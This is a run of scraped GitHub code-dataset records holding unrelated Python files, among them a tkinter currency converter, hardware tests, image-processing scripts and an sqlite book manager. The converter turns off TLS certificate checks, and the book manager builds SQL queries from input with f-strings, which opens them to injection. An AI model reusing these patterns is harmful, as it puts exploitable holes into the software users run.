\")\n x39.place(x=250, y=265)\n out39 = Label(root)\n out39.config(text = '{:0.2f}'.format(val39))\n out39.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_BRL(self):\n global user_value40\n user_ask40 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask40.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value40 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value40.place(x=370, y=225)\n\n calcButton40 = Button(self, text=\" Convert \", command=self.cal40)\n calcButton40.place(x=265, y=450)\n root.bind(\"\", self.linkCal40)\n def linkCal40(self, event=None):\n self.cal40()\n def cal40(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val40= float(user_value40.get()) * (brl_rate)\n int(val40)\n\n x40 = Label(root, text=\"BRL: \")\n x40.place(x=250, y=265)\n out40 = Label(root)\n out40.config(text = '{:0.2f}'.format(val40))\n out40.place(x=380, y=265)\n\n self.again()\n \n def validate(self, new_text): #currency value validation (float --> vcmd)\n if new_text == \"-\":\n return True\n elif not new_text:\n return True\n\n try:\n self.entered_number=float(new_text)\n return True\n except ValueError:\n return False\n \n def app_exit(self): #Exit app\n exit()\n\n def endingTitle(self): #Ending title\n endTitle = Label(self, text=\"Thank you for using Currency Converter\")\n endTitle.place(x=200, y=335)\n subTitle = Label(self, text=\"Presented by Brownies Converters\")\n subTitle.place(x=220, y=370)\n lastTitle = Label(self, text=\"App will close in 3 seconds...\")\n lastTitle.place(x=235, y=400)\n \n root.after(1000, self.lastTitle2)\n root.after(2000, self.lastTitle3)\n root.after(3000, self.app_exit)\n def lastTitle2(self):\n lastTitle = Label(self, text=\"App will close in 2 seconds...\")\n lastTitle.place(x=235, y=400)\n def lastTitle3(self):\n lastTitle = Label(self, text=\"App will close in 1 seconds...\")\n lastTitle.place(x=235, y=400)\n\nroot.geometry(\"650x500\") #Display size\napp = mainWindow(root)\n\nroot.mainloop()\n","repo_name":"rajessen-sanassy/Currency-Converter","sub_path":"Brownies Converter/Converter_2 vFinal.py","file_name":"Converter_2 vFinal.py","file_ext":"py","file_size_in_byte":63921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71060977832","text":"from nmigen_cocotb import run\nimport cores_nmigen.utils.matrix as mat\nfrom cores_nmigen.test.interfaces import MatrixStreamDriver\nfrom cores_nmigen.test.matrix_bypass import MatrixInterfaceBypass\nimport pytest\nimport os\n\ntry:\n import cocotb\n from cocotb.triggers import RisingEdge\n from cocotb.clock import Clock\n from cocotb.regression import TestFactory as TF\nexcept:\n pass\n\nCLK_PERIOD_BASE = 100\n\n\n@cocotb.coroutine\ndef init_test(dut):\n dut.rst <= 1\n cocotb.fork(Clock(dut.clk, 10, 'ns').start())\n yield RisingEdge(dut.clk)\n dut.rst <= 0\n yield RisingEdge(dut.clk)\n\ndef incremental_matrix(shape, size):\n data = []\n count = 0\n for i in range(size):\n matrix = mat.create_empty_matrix(shape)\n for idx in mat.matrix_indexes(shape):\n mat.set_matrix_element(matrix, idx, count)\n count += 1\n data.append(matrix)\n return data\n\n\n@cocotb.coroutine\ndef check_data(dut, shape, dummy=0):\n \n test_size = 20\n yield init_test(dut)\n\n m_axis = MatrixStreamDriver(dut, name='input_', clock=dut.clk, shape=shape)\n s_axis = MatrixStreamDriver(dut, name='output_', clock=dut.clk, shape=shape)\n m_axis.init_sink()\n s_axis.init_source()\n\n yield RisingEdge(dut.clk)\n\n wr_data = incremental_matrix(shape, test_size)\n expected_output_length = len(wr_data)\n\n cocotb.fork(m_axis.monitor())\n cocotb.fork(s_axis.monitor())\n cocotb.fork(s_axis.recv(expected_output_length, burps=False))\n\n yield m_axis.send(wr_data, burps=False)\n\n while len(s_axis.buffer) < len(m_axis.buffer):\n yield RisingEdge(dut.clk)\n\n dut._log.info(f'Buffer in length: {len(m_axis.buffer)}.')\n dut._log.info(f'Buffer out length: {len(s_axis.buffer)}.')\n \n assert len(s_axis.buffer) == expected_output_length, f'{len(s_axis.buffer)} != {expected_output_length}'\n assert m_axis.buffer == s_axis.buffer, f'{m_axis.buffer} == {s_axis.buffer}'\n\n\ntry:\n string_to_tuple = lambda string: tuple([int(i) for i in string.replace('(', '').replace(')', '').split(',')])\n running_cocotb = True\n shape = string_to_tuple(os.environ['coco_param_shape'])\nexcept KeyError as e:\n running_cocotb = False\n\nif running_cocotb:\n tf_test_data = TF(check_data)\n tf_test_data.add_option('shape', [shape])\n tf_test_data.generate_tests()\n\n\n@pytest.mark.timeout(10)\n@pytest.mark.parametrize(\"width, shape\", [(8, (4,2)),\n (8, (4,3,2)),\n ])\ndef test_matrix_interface(width, shape):\n os.environ['coco_param_shape'] = str(shape)\n core = MatrixInterfaceBypass(width=width,\n shape=shape\n )\n ports = core.get_ports()\n printable_shape = '_'.join([str(i) for i in shape])\n vcd_file = f'./test_matrix_interface_i{width}_shape{printable_shape}.vcd'\n run(core, 'cores_nmigen.test.test_matrix_interface', ports=ports, vcd_file=vcd_file)\n","repo_name":"akukulanski/cores-nmigen","sub_path":"cores_nmigen/test/test_matrix_interface.py","file_name":"test_matrix_interface.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6661999328","text":"from turtle import Turtle\r\n\r\nt = Turtle()\r\n\r\nt.width(1)\r\n\r\nside = 10\r\n\r\nwidth = 11\r\n\r\nheight = 9\r\n\r\nwhite, black, grey, pink, transparent = \"white\", \"black\", \"#EEF4F4\", \"#FF686C\", \"#ADD8E6\"\r\n\r\nt.speed(500)\r\n\r\n#bgcolor won't work, bug?\r\n\r\nt.color(\"#ADD8E6\")\r\n\r\n#couldnt really use a loop here. or i was just too lazy to\r\n#think, not sure on that one\r\n\r\n#i would have used bgcolor but it wouldnt work for some\r\n#reason.\r\n\r\nt.begin_fill()\r\nt.left(90)\r\nt.setpos(260, 420)\r\nt.left(90)\r\nt.forward(260 * 2)\r\nt.left(90)\r\nt.forward(1200)\r\nt.left(90)\r\nt.forward(260 * 2)\r\nt.left(90)\r\nt.forward(1200)\r\nt.end_fill()\r\nt.setposition(-(width * (side/2)), height * (side/2))\r\n\r\nt.right(90)\r\n\r\ndef row(pixels):\r\n for (color, count) in pixels:\r\n t.color(color)\r\n for j in range(count):\r\n t.begin_fill()\r\n for k in range(4):\r\n t.forward(side)\r\n t.right(90)\r\n t.end_fill()\r\n t.forward(side)\r\n t.penup()\r\n t.back(width * side)\r\n t.right(90)\r\n t.forward(side)\r\n t.left(90)\r\n t.pendown()\r\nt.speed(50)\r\n \r\nrow([(transparent, 1), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1)])\r\nrow([(transparent, 5), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1)])\r\nrow([(transparent, 4), (white, 1), (white, 1), (black, 1), (white, 1), (black, 1), (white, 1), (white, 1)])\r\nrow([(transparent, 4), (white, 7)])\r\nrow([(transparent, 5), (white, 2), (black, 1), (white, 2), (grey, 1), (white, 3)])\r\nrow([(transparent, 2), (grey, 1), (white, 1), (pink, 1), (white, 1), (grey, 1), (white, 5)])\r\nrow([(transparent, 1), (white, 1), (grey, 3), (white, 5)])\r\nrow([(transparent, 2), (white, 9)])\r\nrow([(transparent, 3), (white, 1), (transparent, 1), (white, 1), (transparent, 2), (white, 1), (transparent, 1), (white, 1)])\r\nt.ht()","repo_name":"brendanstuff/wisconsin","sub_path":"pixelart.py","file_name":"pixelart.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20186827236","text":"import cv2\nimport numpy as np\n\ndef filterBilateral():\n src = cv2.imread(\"images/cat.bmp\", cv2.IMREAD_GRAYSCALE)\n\n if src is None :\n return \n\n noise = np.zeros(src.shape, np.int32)\n cv2.randn(noise, 0, 5)\n src = cv2.add(src, noise, dtype=cv2.CV_8UC1)\n\n dst1 = cv2.GaussianBlur(src, (0,0), 5)\n dst2 = cv2.bilateralFilter(src, -1, 10, 5)\n\n cv2.imshow(\"src\", src)\n cv2.imshow(\"dst1\", dst1)\n cv2.imshow(\"dst2\", dst2)\n\n cv2.waitKey()\n cv2.destroyAllWindows()\n\nfilterBilateral()","repo_name":"laply/studyopencv","sub_path":"start to book/filterring/bilateral.py","file_name":"bilateral.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36964163557","text":"from flask import Flask, render_template\nimport os\nimport models\n\n# This method is run when \"flask run\" is run from the command line\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n \n # Load secret keys from instance/config.py file\n app.config.from_pyfile('config.py')\n\n # Tell flask what config file and class to load via .env variable in config.py\n app.config.from_object(os.environ['APP_SETTINGS'])\n\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n models.db.init_app(app)\n\n from models import User, Food\n\n with app.app_context():\n # models.db.drop_all()\n models.db.create_all()\n\n # if test_config is None:\n # # load the instance config, if it exists, when not testing\n # app.config.from_pyfile('config.py', silent=True)\n # else:\n # # load the test config if passed in\n # app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n import auth\n app.register_blueprint(auth.bp)\n\n import food\n app.register_blueprint(food.bp)\n\n return app","repo_name":"tliss/freshi-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"27752134818","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nT = int(input())\r\nfor __ in range(T):\r\n ans = 0\r\n n = int(input())\r\n dic = {} # idx, cnt\r\n S = list(input().strip())\r\n for i in range(n):\r\n s = S[i]\r\n if s in dic:\r\n if i-dic[s][0] > 1:\r\n ans += dic[s][1]*((i-dic[s][0]-1)*5)\r\n dic[s][0] = i\r\n dic[s][1] += 1\r\n else:\r\n dic[s] = [i,1]\r\n print(ans)","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Gold/3655. 먼저 가세요/먼저 가세요.py","file_name":"먼저 가세요.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30777876222","text":"import os\nimport glob\nimport cv2\nimport pandas as pd\nimport random\n\ndef make_dir(path):\n if not os.path.isdir(path):\n os.mkdir(path)\n\ndef make_image(data_path, video_path, label_name, index=0, save_seq=50):\n # Make Dir\n make_dir(path=os.path.join(data_path, label_name))\n\n # Make Image Data\n cap = cv2.VideoCapture(video_path)\n\n while True:\n\n ret, frame = cap.read()\n index += 1\n\n if index % 10000 == 0:\n print('>>> Index {} Save'.format(index))\n\n if not ret:\n print('>>> Save Image | {}'.format(label_name))\n print('>>> Final Index is | {}'.format(index))\n cap.release()\n break\n\n if index % save_seq == 0:\n label_path = os.path.join(data_path, label_name, str(label_name) + '_' + str(index) + '.png')\n cv2.imwrite(label_path, frame)\n\n return index\n\nif __name__ == '__main__':\n\n # Data Path\n data_path = os.path.join(os.getcwd().split('/src')[0], 'datasets')\n\n # Find Video Data\n video_list = glob.glob(os.path.join(data_path, '*.mp4'))\n video_path = video_list[0]\n\n # Main\n idx = make_image(data_path=data_path, video_path=video_list[0], label_name='inf')\n make_image(data_path=data_path, video_path=video_list[1], label_name='inf', index=idx+1)\n make_image(data_path=data_path, video_path=video_list[2], label_name='ani', save_seq=20)\n","repo_name":"saeu5407/Styletransfer","sub_path":"src/utils/databuilder.py","file_name":"databuilder.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10393128859","text":"import sys\n\nn = int(sys.stdin.readline())\nstack = []\nfor _ in range(n):\n cmd = sys.stdin.readline().strip() #readline() contains line feed\n if cmd == 'pop':\n print(stack.pop() if len(stack) > 0 else -1)\n elif cmd == 'size':\n print(len(stack))\n elif cmd == 'empty':\n print(int(len(stack) == 0))\n elif cmd == 'top':\n print(stack[-1] if len(stack) != 0 else -1)\n else:\n stack.append(cmd[5: ])\n","repo_name":"beyondthemist/Problem-solving-solution","sub_path":"BAEKJOON/10828/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13542605159","text":"from typing import TYPE_CHECKING\nimport logging\nfrom ezdxf.lldxf.attributes import DXFAttr, DXFAttributes, DefSubclass\nfrom ezdxf.lldxf.const import DXF12, SUBCLASS_MARKER\nfrom ezdxf.entities.dxfentity import base_class, SubclassProcessor, DXFEntity\nfrom ezdxf.entities.layer import acdb_symbol_table_record\nfrom .factory import register_entity\n\nlogger = logging.getLogger('ezdxf')\n\nif TYPE_CHECKING:\n from ezdxf.eztypes import TagWriter, DXFNamespace\n\n__all__ = ['Textstyle']\n\nacdb_style = DefSubclass('AcDbTextStyleTableRecord', {\n 'name': DXFAttr(2, default='Standard'),\n 'flags': DXFAttr(70, default=0),\n 'height': DXFAttr(40, default=0), # fixed height, 0 if not fixed\n 'width': DXFAttr(41, default=1), # width factor\n 'oblique': DXFAttr(50, default=0), # oblique angle in degree, 0 = vertical\n 'generation_flags': DXFAttr(71, default=0), # 2 = backward, 4 = mirrored in Y\n 'last_height': DXFAttr(42, default=2.5), # last height used\n 'font': DXFAttr(3, default='txt'), # primary font file name\n 'bigfont': DXFAttr(4, default=''), # big font name, blank if none\n})\n\n\n@register_entity\nclass Textstyle(DXFEntity):\n \"\"\" DXF STYLE entity \"\"\"\n DXFTYPE = 'STYLE'\n DXFATTRIBS = DXFAttributes(base_class, acdb_symbol_table_record, acdb_style)\n\n def load_dxf_attribs(self, processor: SubclassProcessor = None) -> 'DXFNamespace':\n dxf = super().load_dxf_attribs(processor)\n if processor:\n tags = processor.load_dxfattribs_into_namespace(dxf, acdb_style)\n if len(tags) and not processor.r12:\n processor.log_unprocessed_tags(tags, subclass=acdb_style.name)\n return dxf\n\n def export_entity(self, tagwriter: 'TagWriter') -> None:\n super().export_entity(tagwriter)\n # AcDbEntity export is done by parent class\n if tagwriter.dxfversion > DXF12:\n tagwriter.write_tag2(SUBCLASS_MARKER, acdb_symbol_table_record.name)\n tagwriter.write_tag2(SUBCLASS_MARKER, acdb_style.name)\n\n # for all DXF versions\n self.dxf.export_dxf_attribs(tagwriter, [\n 'name', 'flags', 'height', 'width', 'oblique', 'generation_flags', 'last_height', 'font', 'bigfont'\n ])\n\n","repo_name":"tapnair/DXFImporter","sub_path":"DXFImporter/lib/ezdxf/entities/textstyle.py","file_name":"textstyle.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75024361511","text":"from tkinter.ttk import Combobox\nfrom Box_Message import *\nfrom Menu_mode import *\ndef display_model_message(event):\n Message_box.config(state=tk.NORMAL)\n Message_box.delete(\"1.0\", \"end\")\n Message_box.insert(tk.END, model_list.get() + \":\\n\")\n model_message_info = model_message[model_list.get()]\n Message_box.insert(tk.END, model_message_info)\n # 字体\n Message_box.config(font=(font_style, font_size + 4))\n # 尺寸\n Message_box.config(width=message_box_size[0], height=message_box_size[1])\n Message_box.config(state=tk.DISABLED)\n Message_box.update()\n\n#先获取当前的模式\nselected_model = tk.StringVar()\n#获得当前的模式\nselected_model.set(mode_dict[selected_mode.get()][0])\n#创建下拉框\nmodel_list_list = mode_dict[selected_mode.get()]\nmodel_list = Combobox(\n window, values=model_list_list\n , textvariable=selected_model, state=\"readonly\",background=colors[2],foreground=colors[3],\n)\n#绑定事件:模式改变时,改变模型列表\ndef change_model_list(event):\n model_list.config(values=mode_dict[selected_mode.get()])\n model_list.current(0)#设置默认值,即默认选择第一个\n# -----------------------------------------------------------------------------------#\n#绑定\nselected_mode.trace(\"w\", lambda *args: change_model_list(None))\n\n\n# 设置 Combobox 的样式\nmodel_list.config(width=ComboBox_model_size[0])\nmodel_list.config(font=cbox_font)\n# 设置 Combobox 的颜色\nmodel_list.config(background=cbox_colors[2], foreground=cbox_colors[3])\nLabel_model = tk.Label(window, text=\"模型:\")\n# 设置 Label 的样式\nLabel_model.config(anchor=tk.E)\nLabel_model.config(width=Label_model_size[0], height=Label_model_size[1])\nLabel_model.config(bg=cbox_colors[0], fg=cbox_colors[1], font=cbox_font)\n# 绑定事件\nmodel_list.bind(\"<>\", display_model_message)\n\nif __name__ == \"__main__\":\n Label_model.grid(row=0, column=0, sticky=tk.W)\n model_list.grid(row=0, column=1, sticky=tk.W)\n window.mainloop()\n","repo_name":"Code-WSY/GPT-SY","sub_path":"gpt_sy/Cbox_Model.py","file_name":"Cbox_Model.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31255316436","text":"import tensorflow as tf\nfrom archs.gan import GAN\nfrom tensorflow.python.keras.models import Input\n\n\nclass AC_GAN(GAN):\n def __init__(self, ce_weight_generator=0.1, ce_weight_discriminator=1, classify_generated=False, **kwargs):\n super(AC_GAN, self).__init__(**kwargs)\n self.ce_weight_generator = ce_weight_generator\n self.ce_weight_discriminator = ce_weight_discriminator\n self.classify_generated = classify_generated\n self.additional_inputs_for_discriminator_train = [Input((1,), dtype='int32')]\n\n def additional_discriminator_losses(self):\n losses = []\n cls_real = self.ce_weight_discriminator * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits\n (labels=tf.squeeze(self.additional_inputs_for_discriminator_train[0], axis=1),\n logits=self.discriminator_real_output[1]))\n self.discriminator_metric_names.append('cls_real')\n losses.append(cls_real)\n if self.classify_generated:\n cls_fake = self.ce_weight_discriminator * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits\n (labels=tf.squeeze(self.generator_input[1], axis=1), logits=self.discriminator_fake_output[1]))\n losses.append(cls_fake)\n self.discriminator_metric_names.append('cls_fake')\n return losses\n\n def additional_generator_losses(self):\n cls_real = self.ce_weight_generator * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits\n (labels=tf.squeeze(self.generator_input[1], axis=1), logits=self.discriminator_fake_output[1]))\n self.generator_metric_names.append('cls')\n return [cls_real]\n","repo_name":"huangleiBuaa/StochasticityBW","sub_path":"SBW_GAN_TF/gan/archs/ac_gan.py","file_name":"ac_gan.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"41243802918","text":"import sqlite3\nfrom sqlite3 import Error\nfrom .conection import create_conection #con el punto establecemos el mismo path\n\n#En este archivo estan las consultas para la base de datos\n\n\ndef insert_book(data):\n conn = create_conection()\n sql = \"\"\" INSERT INTO BOOKS (TITLE, CATEGORY, PAGE_QTY, BOOK_PATH, DESCRIPTION)\n VALUES(?, ?, ?, ?, ?)\n \"\"\"\n try:\n cur = conn.cursor() #Establecemos el cursor\n cur.execute(sql,data)#Pasamos la consulta y los datos\n conn.commit()#Aplicamos la operacion\n print(\"New book aggregate\")\n return True #avisamos que la insercion fue correcta\n except Error as e:\n print(\"Error inserting new book: \" + str(e))\n finally: #esto siempre se ejecuta independientemente de si ocurre o no un error\n if conn:\n cur.close()\n conn.close() #es buena practica cerrar la conexion despues de la consulta\n\n\ndef update_book(_id,data): #para poder agregar variables a strings colocamos una f\n conn = create_conection()\n sql = f\"\"\" UPDATE BOOKS SET \n TITLE = ?,\n CATEGORY = ?,\n PAGE_QTY = ?,\n PAGE_QTY_READ = ?,\n BOOK_PATH = ?,\n DESCRIPTION = ?\n WHERE BOOK_ID = {_id} \n \n \"\"\"\n\n try:\n cur = conn.cursor()\n cur.execute(sql,data)\n conn.commit()\n print(\"Edit book succes\")\n return True\n except Error as e:\n print(\"Error updating book: \" + str(e))\n finally:\n if conn:\n cur.close()\n conn.close()\n\ndef delete_book(_id):\n conn = create_conection()\n sql = f\" DELETE from BOOKS where BOOK_ID = {_id}\"\n\n try:\n cur = conn.cursor()\n cur.execute(sql) #aca no recive datos, solo la conexion\n conn.commit()\n print(\"Delete book succes\")\n return True\n except Error as e:\n print(\"Error deleting book: \" + str(e))\n finally:\n if conn:\n cur.close()\n conn.close()\n\ndef select_all_books():\n conn = create_conection()\n sql = \"\"\" SELECT * FROM BOOKS \"\"\"\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n #En las funciones en las que no agreamos datos no necesitamos hacer un commit\n #Asi que los capturamos de la siguiente manera\n books = cur.fetchall() #traemos todos los datos y los almacenamos\n return books\n except Error as e:\n print(\"Error selecting all books: \" + str(e))\n finally:\n if conn:\n cur.close()\n conn.close()\n\ndef select_book_by_id(_id):\n conn = create_conection()\n sql = f\" SELECT * FROM BOOKS WHERE BOOK_ID = {_id} \"\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n book = cur.fetchone() #la consulta solo retorna un valor\n return book\n except Error as e:\n print(\"Error selecting book by id: \" + str(e))\n finally:\n if conn:\n cur.close()\n conn.close()\n\ndef select_book_by_title(TITLE):\n conn = create_conection() #Usamos like para la consulta para buscar titulos similares, no exactamemte iguales\n sql = f\" SELECT * FROM BOOKS WHERE TITLE LIKE '%{TITLE}%'\"\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n book = cur.fetchall() #la consulta en este caso puede mostrar muchos libros con los titulos similares\n return book\n except Error as e:\n print(\"Error selecting book by title: \" + str(e))\n finally:\n if conn:\n cur.close()\n conn.close()\n\ndef select_book_by_category(CATEGORY):\n conn = create_conection()\n sql = f\" SELECT * FROM BOOKS WHERE CATEGORY LIKE '%{CATEGORY}%'\"\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n book = cur.fetchall()\n return book\n except Error as e:\n print(\"Error selecting book by category: \" + str(e))\n finally:\n if conn:\n cur.close()\n conn.close()\n\n\n\n","repo_name":"Ralonso20/BookManager","sub_path":"db/books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3634148777","text":"\n\n\nfrom a.infra.misc.enum_with_value import EnumWithValue\nfrom a.infra.basic.return_codes import ReturnCodes\nfrom a.infra.misc.init_guard import InitGuard\n\nfrom a.sys.confd.pyconfdlib.tag_values import TagValues\nfrom a.sys.confd.pyconfdlib.value import Value\nfrom a.sys.confd.pyconfdlib.key_path import KeyPath\n\nfrom config_u_maapi_base_gen import ConfigUMaapiBase\n\n\n\n\nclass BlinkyConfigUMaapi(ConfigUMaapiBase):\n def __init__ (self, logger):\n self.myInitGuard = InitGuard()\n self._log=logger.createLogger(\"sys-blinky-oper-example\",\"blinky-maapi-configU\")\n self.domain = None\n\n \n\n \n self.valueConfigU1Requested = False\n self.valueConfigU1 = None\n self.valueConfigU1Set = False\n \n\n def init (self, domain):\n self.myInitGuard.crashIfInitDone()\n for logFunc in self._log('init').debug3Func(): logFunc('called. domain=%s', domain)\n self.domain = domain\n self.myInitGuard.initDone()\n\n def requestConfigAndOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config-and-oper').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(True)\n \n \n \n\n def requestConfig (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(True)\n \n \n \n\n def requestOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-oper').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(False)\n \n \n \n\n def clearAllRequested (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-requested').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(False)\n \n \n \n\n def clearAllSet (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-set').debug3Func(): logFunc('called, PARAMS')\n \n self.setValueConfigU1(None)\n self.valueConfigU1Set = False\n \n \n\n def write (self\n , configU\n , trxContext=None\n ):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('write').debug3Func(): logFunc('called, PARAMS')\n return self._internalWrite(configU, trxContext)\n\n def read (self\n , configU\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(configU, \n False,\n trxContext)\n\n def readAllOrFail (self\n , configU\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-all-or-fail').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(configU, \n True,\n trxContext)\n\n\n\n def requestValueConfigU1 (self, requested):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-valueconfigu1').debug3Func(): logFunc('called. requested=%s', requested)\n self.valueConfigU1Requested = requested\n self.valueConfigU1Set = False\n\n def isValueConfigU1Requested (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('is-valueconfigu1-requested').debug3Func(): logFunc('called. requested=%s', self.valueConfigU1Requested)\n return self.valueConfigU1Requested\n\n def getValueConfigU1 (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('get-valueconfigu1').debug3Func(): logFunc('called. self.valueConfigU1Set=%s, self.valueConfigU1=%s', self.valueConfigU1Set, self.valueConfigU1)\n if self.valueConfigU1Set:\n return self.valueConfigU1\n return None\n\n def hasValueConfigU1 (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('has-valueconfigu1').debug3Func(): logFunc('called. self.valueConfigU1Set=%s, self.valueConfigU1=%s', self.valueConfigU1Set, self.valueConfigU1)\n if self.valueConfigU1Set:\n return True\n return False\n\n def setValueConfigU1 (self, valueConfigU1):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('set-valueconfigu1').debug3Func(): logFunc('called. valueConfigU1=%s, old=%s', valueConfigU1, self.valueConfigU1)\n self.valueConfigU1Set = True\n self.valueConfigU1 = valueConfigU1\n\n\n def _clearAllReadData (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-read-data').debug3Func(): logFunc('called')\n\n \n\n \n self.valueConfigU1 = 0\n self.valueConfigU1Set = False\n \n\n def _getSelfKeyPath (self, configU\n \n , junkForTemplate):\n for logFunc in self._log('get-self-key-path').debug3Func(): logFunc('called. PARAMS, junkForTemplate=%s', junkForTemplate)\n keyPath = KeyPath()\n \n \n ancestorVal = Value()\n ancestorVal.setString(configU);\n keyPath.addKeyPathPrefix(ancestorVal)\n \n xmlVal = Value()\n xmlVal.setXmlTag((\"config-u\", \"http://qwilt.com/model/oper\", \"oper\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n \n xmlVal = Value()\n xmlVal.setXmlTag((\"config-a\", \"http://qwilt.com/model/oper\", \"oper\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n\n for logFunc in self._log('get-self-key-path-done').debug3Func(): logFunc('done. keyPath=%s. PARAMS', keyPath)\n return keyPath\n\n def _internalWrite (self, \n configU, \n \n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-write').debug3Func(): logFunc('called. PARAMS')\n\n tagValueList = TagValues()\n\n res = self._fillWriteTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-fill-write-tag-value-failed').errorFunc(): logFunc('_fillWriteTagValues() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n itemsToDelete = []\n res = self._collectItemsToDelete(configU, \n \n itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-collect-items-to-delete-failed').errorFunc(): logFunc('_collectItemsToDelete() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(configU, \n \n None)\n\n res = self.domain.writeMaapi(tagValueList, keyPath, trxContext, itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-domain-failed').errorFunc(): logFunc('domain.writeMaapi() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-write-done').debug3Func(): logFunc('done. PARAMS')\n return ReturnCodes.kOk\n\n def _internalRead (self, \n configU, \n \n readAllOrFail,\n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-read').debug3Func(): logFunc('called. PARAMS, readAllOrFail=%s', readAllOrFail)\n\n if readAllOrFail:\n self._clearAllReadData()\n\n tagValueList = TagValues()\n\n res = self._fillReadTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-fill-read-tag-value-failed').errorFunc(): logFunc('_fillReadTagValues() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(configU, \n \n None)\n\n res = self.domain.readMaapi(tagValueList, keyPath, trxContext)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-domain-failed').errorFunc(): logFunc('domain.readMaapi() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n res = self._readTagValues(tagValueList, readAllOrFail)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-read-tag-values-failed').errorFunc(): logFunc('_readTagValues() failed. PARAMS')\n return 